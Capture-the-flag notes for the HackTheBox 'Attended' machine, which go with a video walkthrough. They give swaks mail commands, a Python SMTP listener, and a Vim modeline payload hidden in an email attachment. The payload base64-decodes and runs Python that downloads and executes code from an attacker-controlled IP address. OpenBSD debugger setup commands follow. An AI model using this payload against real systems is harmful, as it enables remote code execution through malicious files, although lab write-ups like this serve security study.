xct's notes
Search…
Attended
Notes for https://youtu.be/uAvvrBO7zlk

User

Send mails via swaks

1
1) swaks --from '[email protected]' --to '[email protected]' --header "Subject: Please subscribe" --body 'and click the like button' --server attended.htb
2
2) swaks --from '[email protected]' --to '[email protected]' --header "Subject: Please subscribe" --body 'and click the like button' --server attended.htb
3
3) swaks --from '[email protected]' --to '[email protected]' --header "Subject: Please subscribe" --body 'and click the like button' --server attended.htb --attach payload.txt
Copied!

Mail Server

1
from __future__ import print_function
2
from datetime import datetime
3
import asyncore
4
from smtpd import SMTPServer
5
6
class EmlServer(SMTPServer):
7
def process_message(self, peer, mailfrom, rcpttos, data, mail_options=None,rcpt_options=None):
8
print(f"From: {mailfrom}")
9
print(f"To: {rcpttos}")
10
print("Data:")
11
for line in data.split(b"\n"):
12
print(line)
13
14
def run():
15
EmlServer(('0.0.0.0', 25), None)
16
try:
17
asyncore.loop()
18
except KeyboardInterrupt:
19
pass
20
21
if __name__ == '__main__':
22
run()
Copied!

Payload.txt

This pulls a (python-) file called "x" from our webserver and executes it:
1
:!echo aW1wb3J0IHJlcXVlc3RzIGFzIHI7ZXhlYyhyLmdldCgnaHR0cDovLzEwLjEwLjE0Ljc4L3gnKS50ZXh0KQ==| openssl base64 -d -A | python2.7 -
2
||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=1:fdt="
Copied!

HTTP Reverse Shell

Root

Prepare OpenBSD VM

1
export PKG_PATH=https://mirror.fsrv.services/pub/OpenBSD/6.8/packages/amd64/
2
pkg_add -v gdb
3
pkg_add wget
4
pkg_add nano
5
pkg_add py3-pip
6
pkg_add git
7
wget -O ~/.gdbinit-gef.py -q https://github.com/hugsy/gef/raw/master/gef.py
8
echo source ~/.gdbinit-gef.py >> ~/.gdbinit
9
export LC_CTYPE=C.UTF-8
10
egdb
Copied!

EAX-Finder

Final Exploit

Last modified 5mo ago